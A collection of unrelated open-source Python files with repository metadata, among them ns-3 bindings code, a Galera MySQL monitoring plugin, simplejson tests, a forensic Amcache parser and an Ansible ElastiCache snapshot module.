cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## nstime.h (module 'core'): void ns3::TimeValue::Set(ns3::Time const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Time const &', 'value')]) return def register_Ns3TypeIdChecker_methods(root_module, cls): ## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor] cls.add_constructor([]) ## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')]) return def register_Ns3TypeIdValue_methods(root_module, cls): ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor] cls.add_constructor([]) ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')]) ## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor] cls.add_constructor([param('ns3::TypeId const &', 'value')]) ## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function] cls.add_method('Get', 'ns3::TypeId', [], is_const=True) ## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function] cls.add_method('Set', 'void', [param('ns3::TypeId const &', 'value')]) return def register_Ns3Vector2DChecker_methods(root_module, cls): ## vector.h (module 'core'): ns3::Vector2DChecker::Vector2DChecker() [constructor] cls.add_constructor([]) ## vector.h (module 'core'): ns3::Vector2DChecker::Vector2DChecker(ns3::Vector2DChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::Vector2DChecker const &', 'arg0')]) return def register_Ns3Vector2DValue_methods(root_module, cls): ## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue() [constructor] cls.add_constructor([]) ## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue(ns3::Vector2DValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::Vector2DValue const &', 'arg0')]) ## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue(ns3::Vector2D const & value) [constructor] cls.add_constructor([param('ns3::Vector2D const &', 'value')]) ## vector.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::Vector2DValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## vector.h (module 'core'): bool ns3::Vector2DValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## vector.h (module 'core'): ns3::Vector2D ns3::Vector2DValue::Get() const [member function] cls.add_method('Get', 'ns3::Vector2D', [], is_const=True) ## vector.h (module 'core'): std::string ns3::Vector2DValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## vector.h (module 'core'): void ns3::Vector2DValue::Set(ns3::Vector2D const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Vector2D const &', 'value')]) return def register_Ns3Vector3DChecker_methods(root_module, cls): ## vector.h (module 'core'): ns3::Vector3DChecker::Vector3DChecker() [constructor] cls.add_constructor([]) ## vector.h (module 'core'): ns3::Vector3DChecker::Vector3DChecker(ns3::Vector3DChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::Vector3DChecker const &', 'arg0')]) return def register_Ns3Vector3DValue_methods(root_module, cls): ## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue() [constructor] cls.add_constructor([]) ## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue(ns3::Vector3DValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::Vector3DValue const &', 'arg0')]) ## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue(ns3::Vector3D const & value) [constructor] cls.add_constructor([param('ns3::Vector3D const &', 'value')]) ## vector.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::Vector3DValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## vector.h (module 'core'): bool ns3::Vector3DValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## vector.h (module 'core'): ns3::Vector3D ns3::Vector3DValue::Get() const [member function] cls.add_method('Get', 'ns3::Vector3D', [], is_const=True) ## vector.h (module 'core'): std::string ns3::Vector3DValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## vector.h (module 'core'): void ns3::Vector3DValue::Set(ns3::Vector3D const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Vector3D const &', 'value')]) return def register_Ns3AddressChecker_methods(root_module, cls): ## address.h (module 'network'): ns3::AddressChecker::AddressChecker() [constructor] cls.add_constructor([]) ## address.h (module 'network'): ns3::AddressChecker::AddressChecker(ns3::AddressChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::AddressChecker const &', 'arg0')]) return def register_Ns3AddressValue_methods(root_module, cls): ## address.h (module 'network'): ns3::AddressValue::AddressValue() [constructor] cls.add_constructor([]) ## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::AddressValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::AddressValue const &', 'arg0')]) ## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::Address const & value) [constructor] cls.add_constructor([param('ns3::Address const &', 'value')]) ## address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::AddressValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## address.h (module 'network'): bool ns3::AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## address.h (module 'network'): ns3::Address ns3::AddressValue::Get() const [member function] cls.add_method('Get', 'ns3::Address', [], is_const=True) ## address.h (module 'network'): std::string ns3::AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## address.h (module 'network'): void ns3::AddressValue::Set(ns3::Address const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Address const &', 'value')]) return def register_Ns3HashImplementation_methods(root_module, cls): ## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation(ns3::Hash::Implementation const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Implementation const &', 'arg0')]) ## hash-function.h (module 'core'): ns3::Hash::Implementation::Implementation() [constructor] cls.add_constructor([]) ## hash-function.h (module 'core'): uint32_t ns3::Hash::Implementation::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_pure_virtual=True, is_virtual=True) ## hash-function.h (module 'core'): uint64_t ns3::Hash::Implementation::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-function.h (module 'core'): void ns3::Hash::Implementation::clear() [member function] cls.add_method('clear', 'void', [], is_pure_virtual=True, is_virtual=True) return def register_Ns3HashFunctionFnv1a_methods(root_module, cls): ## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a::Fnv1a(ns3::Hash::Function::Fnv1a const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Function::Fnv1a const &', 'arg0')]) ## hash-fnv.h (module 'core'): ns3::Hash::Function::Fnv1a::Fnv1a() [constructor] cls.add_constructor([]) ## hash-fnv.h (module 'core'): uint32_t ns3::Hash::Function::Fnv1a::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-fnv.h (module 'core'): uint64_t ns3::Hash::Function::Fnv1a::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-fnv.h (module 'core'): void ns3::Hash::Function::Fnv1a::clear() [member function] cls.add_method('clear', 'void', [], is_virtual=True) return def register_Ns3HashFunctionHash32_methods(root_module, cls): ## hash-function.h (module 'core'): ns3::Hash::Function::Hash32::Hash32(ns3::Hash::Function::Hash32 const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Function::Hash32 const &', 'arg0')]) ## hash-function.h (module 'core'): ns3::Hash::Function::Hash32::Hash32(ns3::Hash::Hash32Function_ptr hp) [constructor] cls.add_constructor([param('ns3::Hash::Hash32Function_ptr', 'hp')]) ## hash-function.h (module 'core'): uint32_t ns3::Hash::Function::Hash32::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-function.h (module 'core'): void ns3::Hash::Function::Hash32::clear() [member function] cls.add_method('clear', 'void', [], is_virtual=True) return def register_Ns3HashFunctionHash64_methods(root_module, cls): ## hash-function.h (module 'core'): ns3::Hash::Function::Hash64::Hash64(ns3::Hash::Function::Hash64 const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Function::Hash64 const &', 'arg0')]) ## hash-function.h (module 'core'): ns3::Hash::Function::Hash64::Hash64(ns3::Hash::Hash64Function_ptr hp) [constructor] cls.add_constructor([param('ns3::Hash::Hash64Function_ptr', 'hp')]) ## hash-function.h (module 'core'): uint32_t ns3::Hash::Function::Hash64::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-function.h (module 'core'): uint64_t ns3::Hash::Function::Hash64::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-function.h (module 'core'): void ns3::Hash::Function::Hash64::clear() [member function] cls.add_method('clear', 'void', [], is_virtual=True) return def register_Ns3HashFunctionMurmur3_methods(root_module, cls): ## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3::Murmur3(ns3::Hash::Function::Murmur3 const & arg0) [copy constructor] cls.add_constructor([param('ns3::Hash::Function::Murmur3 const &', 'arg0')]) ## hash-murmur3.h (module 'core'): ns3::Hash::Function::Murmur3::Murmur3() [constructor] cls.add_constructor([]) ## hash-murmur3.h (module 'core'): uint32_t ns3::Hash::Function::Murmur3::GetHash32(char const * buffer, size_t const size) [member function] cls.add_method('GetHash32', 'uint32_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-murmur3.h (module 'core'): uint64_t ns3::Hash::Function::Murmur3::GetHash64(char const * buffer, size_t const size) [member function] cls.add_method('GetHash64', 'uint64_t', [param('char const *', 'buffer'), param('size_t const', 'size')], is_virtual=True) ## hash-murmur3.h (module 'core'): void ns3::Hash::Function::Murmur3::clear() [member function] cls.add_method('clear', 'void', [], is_virtual=True) return def register_functions(root_module): module = root_module register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module) register_functions_ns3_Hash(module.get_submodule('Hash'), root_module) register_functions_ns3_TracedValueCallback(module.get_submodule('TracedValueCallback'), root_module) return def register_functions_ns3_FatalImpl(module, root_module): return def register_functions_ns3_Hash(module, root_module): register_functions_ns3_Hash_Function(module.get_submodule('Function'), root_module) return def register_functions_ns3_Hash_Function(module, root_module): return def register_functions_ns3_TracedValueCallback(module, root_module): return def main(): out = FileCodeSink(sys.stdout) root_module = module_init() register_types(root_module) register_methods(root_module) register_functions(root_module) root_module.generate(out) if __name__ == '__main__': main()
gpl-2.0
darrenchan/rpc-openstack
maas/plugins/galera_check.py
3
5208
#!/usr/bin/env python # Copyright 2014, Rackspace US, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import optparse import shlex import subprocess from maas_common import metric from maas_common import print_output from maas_common import status_err from maas_common import status_ok def galera_check(arg): proc = subprocess.Popen(shlex.split(arg), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=False) out, err = proc.communicate() ret = proc.returncode return ret, out, err def generate_query(host, port, output_type='status'): if host: host = ' -h %s' % host else: host = '' if port: port = ' -P %s' % port else: port = '' if output_type == 'status': return ('/usr/bin/mysql --defaults-file=/root/.my.cnf ' '%s%s -e "SHOW GLOBAL STATUS"') % (host, port) elif output_type == 'variables': return ('/usr/bin/mysql --defaults-file=/root/.my.cnf ' '%s%s -e "SHOW GLOBAL VARIABLES"') % (host, port) def parse_args(): parser = optparse.OptionParser(usage='%prog [-h] [-H hostname] [-P port]') parser.add_option('-H', '--host', action='store', dest='host', default=None, help='Host to override the defaults with') parser.add_option('-P', '--port', action='store', dest='port', default=None, help='Port to override the defauults with') return parser.parse_args() def print_metrics(replica_status): status_ok() metric('wsrep_replicated_bytes', 'int64', replica_status['wsrep_replicated_bytes'], 'bytes') metric('wsrep_received_bytes', 'int64', replica_status['wsrep_received_bytes'], 'bytes') metric('wsrep_commit_window_size', 'double', replica_status['wsrep_commit_window'], 'sequence_delta') metric('wsrep_cluster_size', 'int64', replica_status['wsrep_cluster_size'], 'nodes') metric('queries_per_second', 'int64', replica_status['Queries'], 'qps') metric('wsrep_cluster_state_uuid', 'string', replica_status['wsrep_cluster_state_uuid']) metric('wsrep_cluster_status', 'string', replica_status['wsrep_cluster_status']) metric('wsrep_local_state_uuid', 'string', replica_status['wsrep_local_state_uuid']) metric('wsrep_local_state_comment', 'string', replica_status['wsrep_local_state_comment']) metric('mysql_max_configured_connections', 'int64', replica_status['max_connections'], 'connections') metric('mysql_current_connections', 'int64', replica_status['Threads_connected'], 'connections') metric('mysql_max_seen_connections', 'int64', replica_status['Max_used_connections'], 'connections') metric('num_of_open_files', 'int64', replica_status['Open_files'], 'files') metric('open_files_limit', 'int64', replica_status['open_files_limit'], 'files') metric('innodb_row_lock_time_avg', 'int64', replica_status['Innodb_row_lock_time_avg'], 'milliseconds') metric('innodb_deadlocks', 'int64', replica_status['Innodb_deadlocks'], 'deadlocks') metric('access_denied_errors', 'int64', replica_status['Access_denied_errors'], 'access_denied_errors') metric('aborted_clients', 'int64', replica_status['Aborted_clients'], 'aborted_clients') metric('aborted_connects', 'int64', replica_status['Aborted_connects'], 'aborted_connects') def main(): options, _ = parse_args() replica_status = {} for output_type in ['status', 'variables']: retcode, output, err = galera_check( generate_query(options.host, options.port, output_type=output_type) ) if retcode > 0: status_err(err) if not output: status_err('No output received from mysql. Cannot gather metrics.') show_list = output.split('\n')[1:-1] for i in show_list: replica_status[i.split('\t')[0]] = i.split('\t')[1] if replica_status['wsrep_cluster_status'] != "Primary": status_err("there is a partition in the cluster") if (replica_status['wsrep_local_state_uuid'] != replica_status['wsrep_cluster_state_uuid']): status_err("the local node is out of sync") if (int(replica_status['wsrep_local_state']) == 4 and replica_status['wsrep_local_state_comment'] == "Synced"): print_metrics(replica_status) if __name__ == '__main__': with print_output(): main()
apache-2.0
onrik/pyqiwi
setup.py
1
1037
#!/usr/bin/env python # -*- coding: utf-8 -*- from setuptools import setup from pyqiwi import __version__ setup( name='pyqiwi', version=__version__, author='Andrey', author_email='and@rey.im', description='Client for QIWI payment system', license='MIT', url='https://github.com/onrik/pyqiwi', packages=['pyqiwi'], test_suite='tests', tests_require=[ 'httpretty' ], classifiers=[ 'Development Status :: 5 - Production/Stable', 'Environment :: Web Environment', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Topic :: Software Development :: Libraries :: Python Modules', ], )
mit
libyal/dtformats
scripts/amcache.py
1
1588
#!/usr/bin/env python # -*- coding: utf-8 -*- """Script to parse Amcache.hve files.""" import argparse import logging import sys from dtformats import amcache from dtformats import output_writers def Main(): """The main program function. Returns: bool: True if successful or False if not. """ argument_parser = argparse.ArgumentParser(description=( 'Extracts information from Apple System Log files.')) argument_parser.add_argument( '-d', '--debug', dest='debug', action='store_true', default=False, help='enable debug output.') argument_parser.add_argument( 'source', nargs='?', action='store', metavar='PATH', default=None, help='path of the Apple System Log file.') options = argument_parser.parse_args() if not options.source: print('Source file missing.') print('') argument_parser.print_help() print('') return False logging.basicConfig( level=logging.INFO, format='[%(levelname)s] %(message)s') output_writer = output_writers.StdoutWriter() try: output_writer.Open() except IOError as exception: print('Unable to open output writer with error: {0!s}'.format(exception)) print('') return False amcache_file = amcache.WindowsAMCacheFile( debug=options.debug, output_writer=output_writer) amcache_file.Open(options.source) output_writer.WriteText('AMCache information:') # TODO: print amcache information. amcache_file.Close() output_writer.Close() return True if __name__ == '__main__': if not Main(): sys.exit(1) else: sys.exit(0)
apache-2.0
CoderBotOrg/coderbotsrv
server/lib/simplejson/tests/test_dump.py
104
4999
from unittest import TestCase from simplejson.compat import StringIO, long_type, b, binary_type, PY3 import simplejson as json def as_text_type(s): if PY3 and isinstance(s, binary_type): return s.decode('ascii') return s class TestDump(TestCase): def test_dump(self): sio = StringIO() json.dump({}, sio) self.assertEqual(sio.getvalue(), '{}') def test_constants(self): for c in [None, True, False]: self.assertTrue(json.loads(json.dumps(c)) is c) self.assertTrue(json.loads(json.dumps([c]))[0] is c) self.assertTrue(json.loads(json.dumps({'a': c}))['a'] is c) def test_stringify_key(self): items = [(b('bytes'), 'bytes'), (1.0, '1.0'), (10, '10'), (True, 'true'), (False, 'false'), (None, 'null'), (long_type(100), '100')] for k, expect in items: self.assertEqual( json.loads(json.dumps({k: expect})), {expect: expect}) self.assertEqual( json.loads(json.dumps({k: expect}, sort_keys=True)), {expect: expect}) self.assertRaises(TypeError, json.dumps, {json: 1}) for v in [{}, {'other': 1}, {b('derp'): 1, 'herp': 2}]: for sort_keys in [False, True]: v0 = dict(v) v0[json] = 1 v1 = dict((as_text_type(key), val) for (key, val) in v.items()) self.assertEqual( json.loads(json.dumps(v0, skipkeys=True, sort_keys=sort_keys)), v1) self.assertEqual( json.loads(json.dumps({'': v0}, skipkeys=True, sort_keys=sort_keys)), {'': v1}) self.assertEqual( json.loads(json.dumps([v0], skipkeys=True, sort_keys=sort_keys)), [v1]) def test_dumps(self): self.assertEqual(json.dumps({}), '{}') def test_encode_truefalse(self): self.assertEqual(json.dumps( {True: False, False: True}, sort_keys=True), '{"false": true, "true": false}') self.assertEqual( json.dumps( {2: 3.0, 4.0: long_type(5), False: 1, long_type(6): True, "7": 0}, sort_keys=True), '{"2": 3.0, "4.0": 5, "6": true, "7": 0, "false": 1}') def test_ordered_dict(self): # http://bugs.python.org/issue6105 items = [('one', 1), ('two', 2), ('three', 3), ('four', 4), ('five', 5)] s = json.dumps(json.OrderedDict(items)) self.assertEqual( s, '{"one": 1, "two": 2, "three": 3, "four": 4, "five": 5}') def test_indent_unknown_type_acceptance(self): """ A test against the regression mentioned at `github issue 29`_. The indent parameter should accept any type which pretends to be an instance of int or long when it comes to being multiplied by strings, even if it is not actually an int or long, for backwards compatibility. .. _github issue 29: http://github.com/simplejson/simplejson/issue/29 """ class AwesomeInt(object): """An awesome reimplementation of integers""" def __init__(self, *args, **kwargs): if len(args) > 0: # [construct from literals, objects, etc.] # ... # Finally, if args[0] is an integer, store it if isinstance(args[0], int): self._int = args[0] # [various methods] def __mul__(self, other): # [various ways to multiply AwesomeInt objects] # ... finally, if the right-hand operand is not awesome enough, # try to do a normal integer multiplication if hasattr(self, '_int'): return self._int * other else: raise NotImplementedError("To do non-awesome things with" " this object, please construct it from an integer!") s = json.dumps([0, 1, 2], indent=AwesomeInt(3)) self.assertEqual(s, '[\n 0,\n 1,\n 2\n]') def test_accumulator(self): # the C API uses an accumulator that collects after 100,000 appends lst = [0] * 100000 self.assertEqual(json.loads(json.dumps(lst)), lst) def test_sort_keys(self): # https://github.com/simplejson/simplejson/issues/106 for num_keys in range(2, 32): p = dict((str(x), x) for x in range(num_keys)) sio = StringIO() json.dump(p, sio, sort_keys=True) self.assertEqual(sio.getvalue(), json.dumps(p, sort_keys=True)) self.assertEqual(json.loads(sio.getvalue()), p)
gpl-3.0
mohseniaref/PySAR-1
pysar/correlation_with_dem.py
1
2229
#! /usr/bin/env python ############################################################ # Program is part of PySAR v1.0 # # Copyright(c) 2013, Heresh Fattahi # # Author: Heresh Fattahi # ############################################################ import sys import os import getopt import h5py import numpy as np import matplotlib.pyplot as plt import _readfile as readfile def Usage(): print ''' ************************************************************************ ************************************************************************ Calculates the correlation of the dem with the InSAR velocity field. Usage: correlation_with_dem.py dem velocity Example: correlation_with_dem.py radar_8rlks.hgt velocity.h5 *********************************************************************** *********************************************************************** ''' try: demFile=sys.argv[1] File=sys.argv[2] except: Usage() sys.exit(1) if os.path.basename(demFile).split('.')[1]=='hgt': amp,dem,demRsc = readfile.read_float32(demFile) elif os.path.basename(demFile).split('.')[1]=='dem': dem,demRsc = readfile.read_dem(demFile) #amp,dem,demRsc = readfile.read_float32(demFile) h5data = h5py.File(File) dset = h5data['velocity'].get('velocity') data = dset[0:dset.shape[0],0:dset.shape[1]] try: suby=sys.argv[3].split(':') subx=sys.argv[4].split(':') data = data[int(suby[0]):int(suby[1]),int(subx[0]):int(subx[1])] dem = dem[int(suby[0]):int(suby[1]),int(subx[0]):int(subx[1])] except: print 'no subset' dem=dem.flatten(1) data=data.flatten(1) ndx = ~np.isnan(data) C1=np.zeros([2,len(dem[ndx])]) C1[0][:]=dem[ndx] C1[1][:]=data[ndx] print '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' print '' print 'Correlation of the velocity with the DEM: '+ str(np.corrcoef(C1)[0][1]) print '' print'+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' print 'DEM info:' print '' print 'Maximum height difference (m) : ' + str(np.max(dem[ndx])-np.min(dem[ndx])) print 'Average height (m) :'+str(np.mean(dem[ndx])) print 'Height Std: '+str(np.std(dem[ndx]))
mit
Anonymouslemming/ansible
lib/ansible/modules/cloud/amazon/elasticache_snapshot.py
35
8089
#!/usr/bin/python # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. ANSIBLE_METADATA = {'metadata_version': '1.0', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = """ --- module: elasticache_snapshot short_description: Manage cache snapshots in Amazon Elasticache. description: - Manage cache snapshots in Amazon Elasticache. - Returns information about the specified snapshot. version_added: "2.3" author: "Sloane Hertel (@s-hertel)" requirements: [ boto3, botocore ] options: name: description: - The name of the snapshot we want to create, copy, delete required: yes state: description: - Actions that will create, destroy, or copy a snapshot. choices: ['present', 'absent', 'copy'] replication_id: description: - The name of the existing replication group to make the snapshot. required: no default: null cluster_id: description: - The name of an existing cache cluster in the replication group to make the snapshot. required: no default: null target: description: - The name of a snapshot copy required: no default: null bucket: description: - The s3 bucket to which the snapshot is exported required: no default: null """ EXAMPLES = """ # Note: None of these examples set aws_access_key, aws_secret_key, or region. # It is assumed that their matching environment variables are set. --- - hosts: localhost connection: local tasks: - name: 'Create a snapshot' elasticache_snapshot: name: 'test-snapshot' state: 'present' cluster_id: '{{ cluster }}' replication_id: '{{ replication }}' """ RETURN = """ response_metadata: description: response metadata about the snapshot returned: always type: dict sample: http_headers: content-length: 1490 content-type: text/xml date: Tue, 07 Feb 2017 16:43:04 GMT x-amzn-requestid: 7f436dea-ed54-11e6-a04c-ab2372a1f14d http_status_code: 200 request_id: 7f436dea-ed54-11e6-a04c-ab2372a1f14d retry_attempts: 0 snapshot: description: snapshot data returned: always type: dict sample: auto_minor_version_upgrade: true cache_cluster_create_time: 2017-02-01T17:43:58.261000+00:00 cache_cluster_id: test-please-delete cache_node_type: cache.m1.small cache_parameter_group_name: default.redis3.2 cache_subnet_group_name: default engine: redis engine_version: 3.2.4 node_snapshots: cache_node_create_time: 2017-02-01T17:43:58.261000+00:00 cache_node_id: 0001 cache_size: num_cache_nodes: 1 port: 11211 preferred_availability_zone: us-east-1d preferred_maintenance_window: wed:03:00-wed:04:00 snapshot_name: deletesnapshot snapshot_retention_limit: 0 snapshot_source: manual snapshot_status: creating snapshot_window: 10:00-11:00 vpc_id: vpc-c248fda4 changed: description: if a snapshot has been created, deleted, or copied returned: always type: bool sample: changed: true """ # import module snippets from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.ec2 import boto3_conn, get_aws_connection_info, ec2_argument_spec, camel_dict_to_snake_dict import traceback try: import boto3 import botocore HAS_BOTO3 = True except ImportError: HAS_BOTO3 = False def create(module, connection, replication_id, cluster_id, name): """ Create an Elasticache backup. """ try: response = connection.create_snapshot(ReplicationGroupId=replication_id, CacheClusterId=cluster_id, SnapshotName=name) changed = True except botocore.exceptions.ClientError as e: if e.response['Error']['Code'] == "SnapshotAlreadyExistsFault": response = {} changed = False else: module.fail_json(msg="Unable to create the snapshot.", exception=traceback.format_exc()) return response, changed def copy(module, connection, name, target, bucket): """ Copy an Elasticache backup. """ try: response = connection.copy_snapshot(SourceSnapshotName=name, TargetSnapshotName=target, TargetBucket=bucket) changed = True except botocore.exceptions.ClientError as e: module.fail_json(msg="Unable to copy the snapshot.", exception=traceback.format_exc()) return response, changed def delete(module, connection, name): """ Delete an Elasticache backup. """ try: response = connection.delete_snapshot(SnapshotName=name) changed = True except botocore.exceptions.ClientError as e: if e.response['Error']['Code'] == "SnapshotNotFoundFault": response = {} changed = False elif e.response['Error']['Code'] == "InvalidSnapshotState": module.fail_json(msg="Error: InvalidSnapshotState. The snapshot is not in an available state or failed state to allow deletion." "You may need to wait a few minutes.") else: module.fail_json(msg="Unable to delete the snapshot.", exception=traceback.format_exc()) return response, changed def main(): argument_spec = ec2_argument_spec() argument_spec.update( dict( name=dict(required=True, type='str'), state=dict(required=True, type='str', choices=['present', 'absent', 'copy']), replication_id=dict(type='str'), cluster_id=dict(type='str'), target=dict(type='str'), bucket=dict(type='str'), ) ) module = AnsibleModule(argument_spec=argument_spec) if not HAS_BOTO3: module.fail_json(msg='boto required for this module') name = module.params.get('name') state = module.params.get('state') replication_id = module.params.get('replication_id') cluster_id = module.params.get('cluster_id') target = module.params.get('target') bucket = module.params.get('bucket') # Retrieve any AWS settings from the environment. region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True) if not region: module.fail_json(msg=str("Either region or AWS_REGION or EC2_REGION environment variable or boto config aws_region or ec2_region must be set.")) connection = boto3_conn(module, conn_type='client', resource='elasticache', region=region, endpoint=ec2_url, **aws_connect_kwargs) changed = False response = {} if state == 'present': if not all((replication_id, cluster_id)): module.fail_json(msg="The state 'present' requires options: 'replication_id' and 'cluster_id'") response, changed = create(module, connection, replication_id, cluster_id, name) elif state == 'absent': response, changed = delete(module, connection, name) elif state == 'copy': if not all((target, bucket)): module.fail_json(msg="The state 'copy' requires options: 'target' and 'bucket'.") response, changed = copy(module, connection, name, target, bucket) facts_result = dict(changed=changed, **camel_dict_to_snake_dict(response)) module.exit_json(**facts_result) if __name__ == '__main__': main()
gpl-3.0
GdZ/scriptfile
software/googleAppEngine/google/appengine/api/prospective_search/error_pb.py
27
2614
